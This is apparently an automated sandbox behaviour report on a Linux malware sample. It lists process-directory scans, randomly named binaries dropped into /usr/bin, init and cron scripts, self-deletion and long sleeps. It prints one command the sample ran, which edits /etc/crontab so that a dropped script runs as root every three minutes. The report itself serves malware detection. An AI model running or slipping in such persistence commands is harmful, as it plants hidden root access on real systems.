Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/2033/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1582/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1582/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1582/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/2275/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/2275/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1612/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1612/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1612/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1579/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1579/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1579/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1699/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1699/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1699/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1335/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1335/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1698/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1698/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1698/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/2028/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/2028/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1334/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1334/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1576/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1576/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1576/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/2302/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/2302/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/3236/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/3236/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/2025/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/2025/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/2025/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/2146/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/2146/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/912/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/912/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/759/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/759/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/2307/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/2307/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/918/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/918/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1594/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1594/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1594/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/2285/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/2285/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/2281/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/2281/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1349/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1349/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1349/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1623/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1623/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1623/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/761/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/761/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1622/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1622/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1622/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/884/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/884/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1983/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1983/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1983/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/2038/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/2038/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1586/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1586/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1586/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1465/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1465/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1465/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1344/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1344/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1860/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1860/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1860/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1463/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1463/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1463/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/2156/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/2156/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/800/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/800/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/801/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/801/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1629/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1629/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1629/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1627/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1627/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1627/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1900/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1900/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/1900/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/491/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/491/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/2294/fd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/2294/fd	Jump to behavior

Source: /tmp/HaJTqGiPpD (PID: 6235)

Shell command executed: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"

Jump to behavior

Source: /usr/bin/dash (PID: 6202)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.bf7OUfIiir /tmp/tmp.YpFzGJMNgu /tmp/tmp.lS9NOxlH0t			Jump to behavior
Source: /usr/bin/dash (PID: 6203)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.bf7OUfIiir /tmp/tmp.YpFzGJMNgu /tmp/tmp.lS9NOxlH0t			Jump to behavior

Source: /sbin/update-rc.d (PID: 6240)

Systemctl executable: /bin/systemctl -> systemctl daemon-reload

Jump to behavior

Source: /tmp/HaJTqGiPpD (PID: 6230)

Reads from proc file: /proc/stat

Jump to behavior

Source: /tmp/HaJTqGiPpD (PID: 6230)	File written: /usr/lib/libudev.so	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File written: /usr/bin/kigdktzeum	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File written: /usr/bin/mizdkrdyqj	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File written: /usr/bin/becqudbgme	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File written: /usr/bin/sxruomujjd	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File written: /usr/bin/qrabekbstr	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File written: /usr/bin/sotpizdssr	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File written: /usr/bin/gnmftoxpza	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File written: /usr/bin/iulapzbfpq	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File written: /usr/bin/posifzmmhg	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File written: /usr/bin/buxftyvhwp	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File written: /usr/bin/wvbxepjyjx	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File written: /usr/bin/eqznayducj	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File written: /usr/bin/ibkljkndlm	Jump to dropped file

Source: /tmp/HaJTqGiPpD (PID: 6230)

Writes shell script file to disk with an unusual file extension: /etc/init.d/HaJTqGiPpD

Jump to dropped file

Source: /tmp/HaJTqGiPpD (PID: 6230)

Shell script file created: /etc/cron.hourly/gcc.sh

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /etc/init.d/HaJTqGiPpD	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/kigdktzeum	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/mizdkrdyqj	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/becqudbgme	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/sxruomujjd	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/qrabekbstr	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/sotpizdssr	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/gnmftoxpza	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/iulapzbfpq	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/posifzmmhg	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/buxftyvhwp	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/wvbxepjyjx	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/eqznayducj	Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/ibkljkndlm	Jump to dropped file

Sample deletes itself

Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/kigdktzeum	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/mizdkrdyqj	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/becqudbgme	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/sxruomujjd	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/qrabekbstr	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/sotpizdssr	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/gnmftoxpza	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/iulapzbfpq	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/posifzmmhg	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/buxftyvhwp	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/wvbxepjyjx	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/eqznayducj	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/ibkljkndlm	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/oarnkspbbo	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/ungjrprpkb	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/gdmrzwxnqy	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/eperfpvgsg	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/kfgwgvyckw	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/hymrnjeilx	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/rjhjbiwpsr	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/nopfevkjnk	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /usr/bin/vjejifjmgs	Jump to behavior
Source: /usr/bin/kigdktzeum (PID: 6265)	File: /usr/bin/kigdktzeum	Jump to behavior
Source: /usr/bin/kigdktzeum (PID: 6268)	File: /usr/bin/kigdktzeum	Jump to behavior
Source: /usr/bin/kigdktzeum (PID: 6271)	File: /usr/bin/kigdktzeum	Jump to behavior
Source: /usr/bin/kigdktzeum (PID: 6276)	File: /usr/bin/kigdktzeum	Jump to behavior
Source: /usr/bin/kigdktzeum (PID: 6277)	File: /usr/bin/kigdktzeum	Jump to behavior
Source: /usr/bin/mizdkrdyqj (PID: 6282)	File: /usr/bin/mizdkrdyqj	Jump to behavior
Source: /usr/bin/mizdkrdyqj (PID: 6287)	File: /usr/bin/mizdkrdyqj	Jump to behavior
Source: /usr/bin/mizdkrdyqj (PID: 6290)	File: /usr/bin/mizdkrdyqj	Jump to behavior
Source: /usr/bin/mizdkrdyqj (PID: 6293)	File: /usr/bin/mizdkrdyqj	Jump to behavior
Source: /usr/bin/mizdkrdyqj (PID: 6294)	File: /usr/bin/mizdkrdyqj	Jump to behavior
Source: /usr/bin/becqudbgme (PID: 6301)	File: /usr/bin/becqudbgme	Jump to behavior
Source: /usr/bin/becqudbgme (PID: 6304)	File: /usr/bin/becqudbgme	Jump to behavior
Source: /usr/bin/becqudbgme (PID: 6308)	File: /usr/bin/becqudbgme	Jump to behavior
Source: /usr/bin/becqudbgme (PID: 6309)	File: /usr/bin/becqudbgme	Jump to behavior
Source: /usr/bin/becqudbgme (PID: 6312)	File: /usr/bin/becqudbgme	Jump to behavior
Source: /usr/bin/sxruomujjd (PID: 6330)	File: /usr/bin/sxruomujjd	Jump to behavior
Source: /usr/bin/sxruomujjd (PID: 6335)	File: /usr/bin/sxruomujjd	Jump to behavior
Source: /usr/bin/sxruomujjd (PID: 6340)	File: /usr/bin/sxruomujjd	Jump to behavior
Source: /usr/bin/sxruomujjd (PID: 6341)	File: /usr/bin/sxruomujjd	Jump to behavior
Source: /usr/bin/sxruomujjd (PID: 6342)	File: /usr/bin/sxruomujjd	Jump to behavior
Source: /usr/bin/qrabekbstr (PID: 6347)	File: /usr/bin/qrabekbstr	Jump to behavior
Source: /usr/bin/qrabekbstr (PID: 6350)	File: /usr/bin/qrabekbstr	Jump to behavior
Source: /usr/bin/qrabekbstr (PID: 6355)	File: /usr/bin/qrabekbstr	Jump to behavior
Source: /usr/bin/qrabekbstr (PID: 6358)	File: /usr/bin/qrabekbstr	Jump to behavior
Source: /usr/bin/qrabekbstr (PID: 6359)	File: /usr/bin/qrabekbstr	Jump to behavior
Source: /usr/bin/sotpizdssr (PID: 6366)	File: /usr/bin/sotpizdssr	Jump to behavior
Source: /usr/bin/sotpizdssr (PID: 6369)	File: /usr/bin/sotpizdssr	Jump to behavior
Source: /usr/bin/sotpizdssr (PID: 6374)	File: /usr/bin/sotpizdssr	Jump to behavior
Source: /usr/bin/sotpizdssr (PID: 6377)	File: /usr/bin/sotpizdssr	Jump to behavior
Source: /usr/bin/sotpizdssr (PID: 6378)	File: /usr/bin/sotpizdssr	Jump to behavior
Source: /usr/bin/gnmftoxpza (PID: 6383)	File: /usr/bin/gnmftoxpza	Jump to behavior
Source: /usr/bin/gnmftoxpza (PID: 6386)	File: /usr/bin/gnmftoxpza	Jump to behavior
Source: /usr/bin/gnmftoxpza (PID: 6391)	File: /usr/bin/gnmftoxpza	Jump to behavior
Source: /usr/bin/gnmftoxpza (PID: 6394)	File: /usr/bin/gnmftoxpza	Jump to behavior
Source: /usr/bin/gnmftoxpza (PID: 6395)	File: /usr/bin/gnmftoxpza	Jump to behavior
Source: /usr/bin/iulapzbfpq (PID: 6400)	File: /usr/bin/iulapzbfpq	Jump to behavior
Source: /usr/bin/iulapzbfpq (PID: 6403)	File: /usr/bin/iulapzbfpq	Jump to behavior
Source: /usr/bin/iulapzbfpq (PID: 6408)	File: /usr/bin/iulapzbfpq	Jump to behavior
Source: /usr/bin/iulapzbfpq (PID: 6410)	File: /usr/bin/iulapzbfpq	Jump to behavior
Source: /usr/bin/iulapzbfpq (PID: 6412)	File: /usr/bin/iulapzbfpq	Jump to behavior
Source: /usr/bin/posifzmmhg (PID: 6420)	File: /usr/bin/posifzmmhg	Jump to behavior
Source: /usr/bin/posifzmmhg (PID: 6425)	File: /usr/bin/posifzmmhg	Jump to behavior
Source: /usr/bin/posifzmmhg (PID: 6428)	File: /usr/bin/posifzmmhg	Jump to behavior
Source: /usr/bin/posifzmmhg (PID: 6431)	File: /usr/bin/posifzmmhg	Jump to behavior
Source: /usr/bin/posifzmmhg (PID: 6432)	File: /usr/bin/posifzmmhg	Jump to behavior
Source: /usr/bin/buxftyvhwp (PID: 6437)	File: /usr/bin/buxftyvhwp	Jump to behavior
Source: /usr/bin/buxftyvhwp (PID: 6442)	File: /usr/bin/buxftyvhwp	Jump to behavior
Source: /usr/bin/buxftyvhwp (PID: 6447)	File: /usr/bin/buxftyvhwp	Jump to behavior
Source: /usr/bin/buxftyvhwp (PID: 6448)	File: /usr/bin/buxftyvhwp	Jump to behavior
Source: /usr/bin/buxftyvhwp (PID: 6449)	File: /usr/bin/buxftyvhwp	Jump to behavior
Source: /usr/bin/wvbxepjyjx (PID: 6456)	File: /usr/bin/wvbxepjyjx	Jump to behavior
Source: /usr/bin/wvbxepjyjx (PID: 6458)	File: /usr/bin/wvbxepjyjx	Jump to behavior
Source: /usr/bin/wvbxepjyjx (PID: 6460)	File: /usr/bin/wvbxepjyjx	Jump to behavior
Source: /usr/bin/wvbxepjyjx (PID: 6465)	File: /usr/bin/wvbxepjyjx	Jump to behavior
Source: /usr/bin/wvbxepjyjx (PID: 6466)	File: /usr/bin/wvbxepjyjx	Jump to behavior
Source: /usr/bin/eqznayducj (PID: 6471)	File: /usr/bin/eqznayducj	Jump to behavior
Source: /usr/bin/eqznayducj (PID: 6476)	File: /usr/bin/eqznayducj	Jump to behavior
Source: /usr/bin/eqznayducj (PID: 6478)	File: /usr/bin/eqznayducj	Jump to behavior
Source: /usr/bin/eqznayducj (PID: 6481)	File: /usr/bin/eqznayducj	Jump to behavior
Source: /usr/bin/eqznayducj (PID: 6483)	File: /usr/bin/eqznayducj	Jump to behavior
Source: /usr/bin/ibkljkndlm (PID: 6488)	File: /usr/bin/ibkljkndlm	Jump to behavior
Source: /usr/bin/ibkljkndlm (PID: 6494)	File: /usr/bin/ibkljkndlm	Jump to behavior
Source: /usr/bin/ibkljkndlm (PID: 6498)	File: /usr/bin/ibkljkndlm	Jump to behavior
Source: /usr/bin/ibkljkndlm (PID: 6501)	File: /usr/bin/ibkljkndlm	Jump to behavior
Source: /usr/bin/ibkljkndlm (PID: 6502)	File: /usr/bin/ibkljkndlm	Jump to behavior
Source: /usr/bin/oarnkspbbo (PID: 6508)	File: /usr/bin/oarnkspbbo	Jump to behavior
Source: /usr/bin/oarnkspbbo (PID: 6511)	File: /usr/bin/oarnkspbbo	Jump to behavior
Source: /usr/bin/oarnkspbbo (PID: 6515)	File: /usr/bin/oarnkspbbo	Jump to behavior
Source: /usr/bin/oarnkspbbo (PID: 6519)	File: /usr/bin/oarnkspbbo	Jump to behavior
Source: /usr/bin/oarnkspbbo (PID: 6520)	File: /usr/bin/oarnkspbbo	Jump to behavior
Source: /usr/bin/ungjrprpkb (PID: 6525)	File: /usr/bin/ungjrprpkb	Jump to behavior
Source: /usr/bin/ungjrprpkb (PID: 6528)	File: /usr/bin/ungjrprpkb	Jump to behavior
Source: /usr/bin/ungjrprpkb (PID: 6531)	File: /usr/bin/ungjrprpkb	Jump to behavior
Source: /usr/bin/ungjrprpkb (PID: 6536)	File: /usr/bin/ungjrprpkb	Jump to behavior
Source: /usr/bin/ungjrprpkb (PID: 6537)	File: /usr/bin/ungjrprpkb	Jump to behavior
Source: /usr/bin/gdmrzwxnqy (PID: 6542)	File: /usr/bin/gdmrzwxnqy	Jump to behavior
Source: /usr/bin/gdmrzwxnqy (PID: 6545)	File: /usr/bin/gdmrzwxnqy	Jump to behavior
Source: /usr/bin/gdmrzwxnqy (PID: 6552)	File: /usr/bin/gdmrzwxnqy	Jump to behavior
Source: /usr/bin/gdmrzwxnqy (PID: 6551)	File: /usr/bin/gdmrzwxnqy	Jump to behavior
Source: /usr/bin/gdmrzwxnqy (PID: 6554)	File: /usr/bin/gdmrzwxnqy	Jump to behavior
Source: /usr/bin/eperfpvgsg (PID: 6559)	File: /usr/bin/eperfpvgsg	Jump to behavior
Source: /usr/bin/eperfpvgsg (PID: 6568)	File: /usr/bin/eperfpvgsg	Jump to behavior
Source: /usr/bin/eperfpvgsg (PID: 6570)	File: /usr/bin/eperfpvgsg	Jump to behavior
Source: /usr/bin/eperfpvgsg (PID: 6569)	File: /usr/bin/eperfpvgsg	Jump to behavior
Source: /usr/bin/eperfpvgsg (PID: 6571)	File: /usr/bin/eperfpvgsg	Jump to behavior
Source: /usr/bin/kfgwgvyckw (PID: 6580)	File: /usr/bin/kfgwgvyckw	Jump to behavior
Source: /usr/bin/kfgwgvyckw (PID: 6584)	File: /usr/bin/kfgwgvyckw	Jump to behavior
Source: /usr/bin/kfgwgvyckw (PID: 6587)	File: /usr/bin/kfgwgvyckw	Jump to behavior
Source: /usr/bin/kfgwgvyckw (PID: 6588)	File: /usr/bin/kfgwgvyckw	Jump to behavior
Source: /usr/bin/kfgwgvyckw (PID: 6589)	File: /usr/bin/kfgwgvyckw	Jump to behavior
Source: /usr/bin/hymrnjeilx (PID: 6600)	File: /usr/bin/hymrnjeilx	Jump to behavior
Source: /usr/bin/hymrnjeilx (PID: 6597)	File: /usr/bin/hymrnjeilx	Jump to behavior
Source: /usr/bin/hymrnjeilx (PID: 6603)	File: /usr/bin/hymrnjeilx	Jump to behavior
Source: /usr/bin/hymrnjeilx (PID: 6605)	File: /usr/bin/hymrnjeilx	Jump to behavior
Source: /usr/bin/hymrnjeilx (PID: 6606)	File: /usr/bin/hymrnjeilx	Jump to behavior
Source: /usr/bin/rjhjbiwpsr (PID: 6617)	File: /usr/bin/rjhjbiwpsr	Jump to behavior
Source: /usr/bin/rjhjbiwpsr (PID: 6622)	File: /usr/bin/rjhjbiwpsr	Jump to behavior
Source: /usr/bin/rjhjbiwpsr (PID: 6624)	File: /usr/bin/rjhjbiwpsr	Jump to behavior
Source: /usr/bin/rjhjbiwpsr (PID: 6625)	File: /usr/bin/rjhjbiwpsr	Jump to behavior
Source: /usr/bin/rjhjbiwpsr (PID: 6626)	File: /usr/bin/rjhjbiwpsr	Jump to behavior
Source: /usr/bin/nopfevkjnk (PID: 6634)	File: /usr/bin/nopfevkjnk	Jump to behavior
Source: /usr/bin/nopfevkjnk (PID: 6639)	File: /usr/bin/nopfevkjnk	Jump to behavior
Source: /usr/bin/nopfevkjnk (PID: 6641)	File: /usr/bin/nopfevkjnk	Jump to behavior
Source: /usr/bin/nopfevkjnk (PID: 6642)	File: /usr/bin/nopfevkjnk	Jump to behavior
Source: /usr/bin/nopfevkjnk (PID: 6643)	File: /usr/bin/nopfevkjnk	Jump to behavior

Source: /tmp/HaJTqGiPpD (PID: 6230)	Path: /etc/cron.hourly/gcc.sh			Jump to dropped file
Source: /tmp/HaJTqGiPpD (PID: 6230)	Path: /run/gcc.pid			Jump to dropped file

Source: /tmp/HaJTqGiPpD (PID: 6230)

Sleeps longer then 60s: 1800.0s

Jump to behavior

Source: /tmp/HaJTqGiPpD (PID: 6229)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/kigdktzeum (PID: 6264)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/kigdktzeum (PID: 6267)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/kigdktzeum (PID: 6270)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/kigdktzeum (PID: 6273)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/kigdktzeum (PID: 6275)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mizdkrdyqj (PID: 6281)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mizdkrdyqj (PID: 6284)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mizdkrdyqj (PID: 6286)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mizdkrdyqj (PID: 6289)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mizdkrdyqj (PID: 6292)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/becqudbgme (PID: 6299)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/becqudbgme (PID: 6302)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/becqudbgme (PID: 6305)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/becqudbgme (PID: 6307)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/becqudbgme (PID: 6311)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/sxruomujjd (PID: 6329)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/sxruomujjd (PID: 6332)	Queries kernel information via 'uname':	Jump to behavior
